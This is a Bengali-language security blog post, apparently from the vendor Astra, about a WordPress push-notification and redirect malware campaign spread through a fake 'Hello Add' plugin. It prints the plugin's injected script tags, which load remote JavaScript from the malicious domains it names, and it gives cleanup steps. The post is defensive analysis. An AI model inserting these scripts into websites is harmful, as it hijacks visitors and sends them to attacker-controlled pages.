গত কয়েক সপ্তাহ থেকে, Astra-এর নিরাপত্তা গবেষকরা WordPress-এ পুশ নোটিফিকেশন ম্যালওয়্যার ট্র্যাক করছেন . এই প্রচারাভিযানটি ওয়ার্ডপ্রেস ওয়েবসাইটগুলিতে চলমান পুনঃনির্দেশ প্রচারণার সাথে একত্রিত করা হয়েছে৷
কয়েকটি দূষিত ডোমেন যেখানে পুনঃনির্দেশ করা হচ্ছে তার মধ্যে রয়েছে inpagepush[.]com, asoulrox[.]com এবং iclickcdn[.]com, justcannabis[.]online, 0.realhelpcompany[.]ga, fast.helpmart[.]ga/ m[.]js?w=085, ইত্যাদি
হ্যাকাররা সংক্রামিত ওয়ার্ডপ্রেস ওয়েবসাইটগুলিতে একটি বৈধ চেহারার 'হ্যালো অ্যাড' প্লাগইন ইনস্টল করে এই হ্যাক প্রচারাভিযানটিকে আরও পরিশীলিত করতে এবার এক ধাপ এগিয়ে গেছে। নীচে এটি সম্পর্কে আরও।
সম্পর্কিত নির্দেশিকা – সম্পূর্ণ ওয়ার্ডপ্রেস হ্যাক অপসারণ গাইড
পুশ নোটিফিকেশন ম্যালওয়্যারের লক্ষণ – ওয়ার্ডপ্রেস
- অশ্লীল পুশ বিজ্ঞপ্তি: আপনার ওয়েবসাইট দেখার সময় দর্শকদের দূষিত/অশ্লীল পুশ বিজ্ঞপ্তি দেখানো হচ্ছে:
- ওয়েবসাইট পুনঃনির্দেশ: আমাদের ওয়েবসাইট থেকে লিঙ্কে ক্লিক করার সময় ক্ষতিকারক পৃষ্ঠাগুলিতে ওয়েবসাইট পুনঃনির্দেশ (যা আদর্শভাবে আপনার ওয়ার্ডপ্রেসের পৃষ্ঠাগুলিতে যাওয়া উচিত)
কিছু URL যেখানে আপনার ওয়েবসাইট inpagepush[.]com, asoulrox[.]com এবং iclickcdn[.]com অন্তর্ভুক্ত করার জন্য পুনঃনির্দেশিত হতে পারে।
- অজানা প্লাগইন পাওয়া গেছে: কিছু ক্ষেত্রে আমরা শনাক্ত করেছি যে ওয়ার্ডপ্রেসে 'হ্যালো অ্যাড' নামে একটি নতুন ক্ষতিকারক প্লাগইন যোগ করা হয়েছে।
- ডিভাইস নির্দিষ্ট/শুধু মোবাইল ভাইরাস: আমরা লক্ষ্য করেছি যে এই ম্যালওয়্যারটি সত্যিই নিজেকে লুকিয়ে রাখে। এটি সর্বদা পুশ বিজ্ঞপ্তি পাঠাবে না বা ব্যবহারকারীদের পুনঃনির্দেশ করবে না। আচরণটি ডিভাইস-নির্দিষ্ট।
কখনও কখনও ম্যালওয়্যার শুধুমাত্র মোবাইল ডিভাইসে পুশ বিজ্ঞপ্তিগুলি দেখায় এবং কখনও কখনও এটি শুধুমাত্র নতুন ব্যবহারকারীদের পুনঃনির্দেশ করে, এমন কেউ নয় যে ইতিমধ্যে ওয়েবসাইটটি আগে খুলেছে৷
দূষিত হ্যালো অ্যাড প্লাগইন এর কৌতূহলী কেস
আমরা হ্যাকার নিয়ন্ত্রিত ওয়েবসাইটে ব্যবহারকারীদের পুনঃনির্দেশিত করার জন্য এই ক্ষতিকারক ওয়েবসাইটে 'হ্যালো অ্যাড' প্লাগইন যুক্ত হতে দেখেছি।
এই বৈধ খুঁজছেন প্লাগইন পৃষ্ঠার উৎসে নিম্নলিখিত ক্ষতিকারক জাভাস্ক্রিপ্ট কোড যোগ করে:
<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3336627,document.body||document.documentElement)</script>
<script src="https://asoulrox.com/pfe/current/tag.min.js?z=3336643" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush.com/400/3336649" data-cfasync="false" async="async"></script>
এই প্লাগইন দ্বারা যোগ করা কোড পুনঃনির্দেশ করতে একটি গুরুত্বপূর্ণ ভূমিকা পালন করে। যদিও, আমরা দেখেছি হ্যাকাররা প্রতিটি নতুন প্রচারণার সাথে এটিকে বিকশিত করছে এবং অস্পষ্ট করছে৷
কিভাবে পুশ নোটিফিকেশন ম্যালওয়্যার, হ্যালো অ্যাড এবং রিডাইরেক্ট হ্যাক ক্যাম্পেইন ঠিক করবেন
- স্পষ্ট স্থানগুলি পরীক্ষা করুন: হ্যাকারদের কিছু পছন্দের জায়গা আছে যেখানে তারা ভাইরাস/ম্যালওয়্যার কোড ঢোকায়। আপনার ওয়ার্ডপ্রেস ঠিক করা শুরু করার সময়, আপনি এটি দিয়ে শুরু করা ভাল। নিম্নলিখিত ফাইলগুলি প্রথমে দেখা উচিত:
- index.php
- wp-content/themes/{themeName}/functions.php
- wp-config.php
- কোর থিম ফাইল
- .htaccess
- হ্যালো বিজ্ঞাপন প্লাগইন খুঁজুন এবং সরান: আপনি যদি এই 'বৈধ সন্ধানী' প্লাগইনটি খুঁজে পান যা আপনি মনে করেন আপনার বিকাশকারী বা আপনি অতীতে ইনস্টল করেছেন - অনুগ্রহ করে এটি আন-ইনস্টল করুন কারণ এটি এমন নয় 🙂
সম্পর্কিত নির্দেশিকা – WordPress ম্যালওয়্যার অপসারণ
- পুনঃনির্দেশ সরানো হচ্ছে: ওয়ার্ডপ্রেস পুনঃনির্দেশ আক্রমণ কয়েক মাস ধরে ঘটছে। ক্ষতিকারক পুনঃনির্দেশ হ্যাকগুলির যত্ন নেওয়ার জন্য ডাটাবেস টেবিল, মূল থিম ফাইল এবং কখনও কখনও আপনার সার্ভারের কনফিগারেশন ফাইলগুলিও দেখতে হবে। অজানা ইউআরএল থেকে লোড করা স্ক্রিপ্ট/সম্পদ দেখুন।
যেহেতু রিডাইরেকশন ম্যালওয়্যার খুবই প্রচলিত, তাই আমরা রিডাইরেকশন হ্যাকস ফিক্স করার জন্য একটি বিশদ ধাপে ধাপে ভিডিও তৈরি করেছি। যদিও হ্যাকাররা নিরাপত্তা সংস্থাগুলির রাডারে আসা এড়াতে সর্বদা তাদের পদ্ধতিগুলি আপডেট করতে থাকে, আপনার অন্তর্নিহিত নীতি একই।
হ্যাকাররা সর্বদা তাদের পদ্ধতিগুলি বিকশিত করে, বিশ্বের কাছে অজানা দুর্বলতাগুলিকে কাজে লাগায় এবং একটি হ্যাক তৈরি করতে বিভিন্ন শোষণকে একত্রিত করে৷ যদিও হ্যাক অপসারণ করা একটি অংশ, কেউ কখনও হ্যাক না হয় তা নিশ্চিত করার জন্য আরও স্থায়ী কিছু প্রয়োজন - যেমন Astra এর নিরাপত্তা স্যুট 🙂
